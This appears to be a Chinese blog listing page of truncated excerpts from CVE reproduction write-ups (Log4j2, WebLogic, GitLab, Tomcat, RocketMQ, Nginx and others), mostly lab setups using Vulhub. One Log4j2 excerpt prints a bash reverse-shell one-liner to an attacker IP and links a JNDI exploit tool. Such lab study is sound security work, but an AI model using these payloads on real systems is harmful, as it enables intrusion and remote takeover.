cve poc

# __wakeup()魔术方法绕过（CVE-2016-7124） ## 漏洞简介 在php反序列化数据过程中，如果类中存在__wakeup方法，调用 unserilize() 方法前则先调用__wakeup方法，当序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行 ......

# Nginx 文件名逻辑漏洞（CVE-2013-4547）(Vulhub) ## 漏洞简介 在Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7版本中存在错误解析用户请求的url信息，从而导致文件代码执行，权限绕过等问题。 ## 适用环境 Nginx 0.8.41 ~ 1.4 ......

访问靶场界面，发现并无明显注入点，注册个账号试试。 账号密码就随意写，能登陆就可以 然后登录进入后台 然后根据靶场提示，是在welcome.php处发现基于 Web 的测验系统 v1.0 通过 eid 参数包含一个 SQL 注入漏洞，于是第一反应就是在q=1这个参数进行尝试，但是发现没有结果 继续查 ......

仅供技术学习和参考交流，请勿用于违法行为！！！！！！ 本文对Apache log4j2（CVE-2021-44228)进行漏洞复现，Apache Log4j2是一个基于Java的日志记录工具，2021年12月9日爆出Log4j2组件在处理程序日志记录时存在JNDI注入漏洞,掀起了不小风浪。 工具： ......

Vulhub - Docker-Compose file for vulnerability environment 1、介绍 名称：Weblogic WLS Core Components 反序列化命令执行漏洞（CVE-2018-2628） 编号：CVE-2018-2628 原理： 应用：Webl ......

WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞复现 - FreeBuf网络安全行业门户 1、介绍 名称：weblogic XMLDecoder反序列化漏洞(CVE-2017-10271) 编号：CVE-2017-10271 原理：Weblogic的WLS Se ......

### Apache HTTPD 换行解析漏洞（CVE-2017-15715）【项目中遇到】 Apache HTTPD是一款HTTP服务器，它可以通过mod_php来运行PHP网页，其**2.4.0~2.4.29**版本中存在一个解析漏洞，在解析PHP时,**1.php\x0A将按照PHP后缀进行解 ......

上一篇CVE-2021-22205 GitLab RCE之未授权访问深入分析(一)复现分析了第一部分也就是携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的，接下来我将分析exiftool漏洞的原理和最后的触发利用。 希望读者能读有所得，从中收获到自己独特的见解。 ......

> 文章写于2021-11-29，首发在[天融信阿尔法实验室](https://mp.weixin.qq.com/s/Y4mGVhbc3agp1adnUs1GmA) ## 前言 安全研究员`vakzz`于4月7日在hackerone上提交了一个关于gitlab的[RCE漏洞](https://hac ......

### Aapache Tomcat AJP 文件包含漏洞（CVE-2020-1938）【项目中遇到过】 **1. 背景简述** java是目前WEB开发中主流的编程语言，而Tomcat是当前流行的Java中间件服务器之一。 Ghostcat（幽灵猫）是由长亭科技安全研究员发现的存在于 Tomcat ......

### ActiveMQ任意文件写入漏洞（CVE-2016-3088）【现实项目遇到过】 **1. 环境搭建** ```sh cd vulhub-master/activemq/CVE-2016-3088 docker-compose up -d docker-compose config #查看靶 ......

漏洞复现 验证是否存在apache log4j2漏洞 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 反弹shell bash -i >& /dev/tcp/ip/port 0>&1 将此命令进行javarunti ......

# Confluence OGNL表达式注入命令执行漏洞（CVE-2022-26134） ## 简介 Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新，通告了一个严重且已在野利用的代码执行漏洞，攻击者利用这个漏洞即可无需 ......

Redis 3.2.x < 3.2.4 版本存在缓冲区溢出漏洞，可导致任意代码执行。Redis 数据结构存储 的 CONFIG SET 命令中 client-output-buffer-limit 选项处理存在越界写漏洞。构造的 CONFIG SET 命令可导致越界写，代码执行。 漏洞利用： 修改配 ......

# HTTP.SYS远程代码执行漏洞验证及其复现(CVE-2015-1635蓝屏洞) @[TOC](目录标题) ### 漏洞概述 ### http.sys介绍 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序，为了优化IIS服务器性能，从IIS6.0引入，IIS服务 ......

RocketMQ 5.1.0及以下版本，在一定条件下，存在远程命令执行风险。RocketMQ的NameServer、Broker、Controller等多个组件外网泄露，缺乏权限验证，攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。 此外，攻击者可以通过伪造 Roc... ......

# OpenSSH 资源管理错误漏洞(CVE-2021-28041) 漏洞描述： OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。 该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他 网络级 ......

Apache RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。CVE-2023-37582 中，由于对 CVE-2023-33246 修复不完善，导致在Apache RocketMQ NameServer 存在未授权访问的情况下，攻击者可构造恶意请求以RocketMQ运行的系... ......

# Windows漏洞CVE-2019-0708 标签（空格分隔）： 网络攻防技术 ###1.python-exp攻击 步骤 : (1)**开启Windows7的远程桌面服务**：在windows7系统中依次选择【控制面板】→【系统和安全】→【允许远程访问】打开远程访问服务。 (2)**下载漏洞利用 ......

PoC（Proof of Concept），即概念验证。通常是企业进行产品选型时或开展外部实施项目前，进行的poc测试工作。 涉及到这个概念，转自文章 学习了解下 验证内容 1、产品的功能。产品功能由企业提供，企业可以根据自己的需求提供功能清单，也可以通过与多家供应商交流后，列出自己所需要的功能； ......

Vulhub - Docker-Compose file for vulnerability environment 1、介绍 名称：Apache HTTPD 换行解析漏洞 编号：CVE-2017-15715 原理：Apache HTTPD是一款HTTP服务器，它可以通过mod_php来运行PHP网 ......

Nginx越界读取缓存漏洞(CVE-2017-7529） - FreeBuf网络安全行业门户 1、介绍 名称：tomcat后台弱口令war包上传部署 编号：CVE-2017-7529 原理：HTTP的range头可以指定start和end的值，然后返回请求文件指定大小的内容。对于一般文件而言，ran ......

参考链接：https://www.freebuf.com/articles/web/372862.html 漏洞简介 漏洞复现 开启vulhub靶场环境，确保shiro正常运行 cd vulhub-master/shiro/CVE-2016-4437 docker-compose up -d doc ......

（转载）修复 K8s SSL/TLS 漏洞（CVE-2016-2183）指南 前言 测试服务器配置 主机名IPCPU内存系统盘数据盘用途 zdeops-master 192.168.9.9 2 4 40 200 Ansible 运维控制节点 ks-k8s-master-0 192.168.9.91 ......

> 2023 年 7 月 24 日，Apache Shiro 发布更新版本，修复了一个身份验证绕过漏洞，漏洞编号：CVE-2023-34478，漏洞危害等级：高危。 Apache Shiro 版本 1.12.0 之前和 2.0.0-alpha-3 之前容易受到路径遍历攻击，当与基于非规范化请求路由请 ......

一、漏洞信息 CVE-2022-24481是发生在CLFS驱动中的一个类型混淆漏洞，通过精巧的对blf文件的部分数据进行构造，可使LogBlockHeader中的ClientContextOffset指向ContainContext，从而造成类型混淆。 二、测试环境及漏洞复现 测试环境 POC： 4 ......

2023年5月23日， Rocketmq 爆出 CVE-2023-33246 RCE高危漏洞。 在一定条件下， 攻击者可以利用该漏洞通过更新配置功能以RocketMQ运行的系统用户身份执行命令 。 漏洞利用与复现 攻击者成功RCE需要满足以下条件 Rocketmq 版本 < 5.1.1 或 < 4. ......

JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具，它可以通过一键生成前后端代码，无需写任何代码，让开发者更多关注业务逻辑。 ......

## 一、漏洞介绍 ### 1、相关背景 在web早期，页面都是以静态页面为主(如：HTML)，没有动态页面的说法，所有还没有动态语言(如：PHP、JSP等)后来Ngnix为支持PHP语言就将有出现php页面的请求给PHP相关程序来进行处理，然后将处理后的结果反馈给用户。而解决PHP的相关程序就是c ......

1、介绍 Tomcat 运行在 Windows 主机上，且启用了 HTTP PUT 请求方法，可通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件，造成任意代码执行。 影响版本：Apache Tomcat 7.0.0 – 7.0.81 2、测试 (1)vulhub存有该漏洞的靶场 3、修复方 ......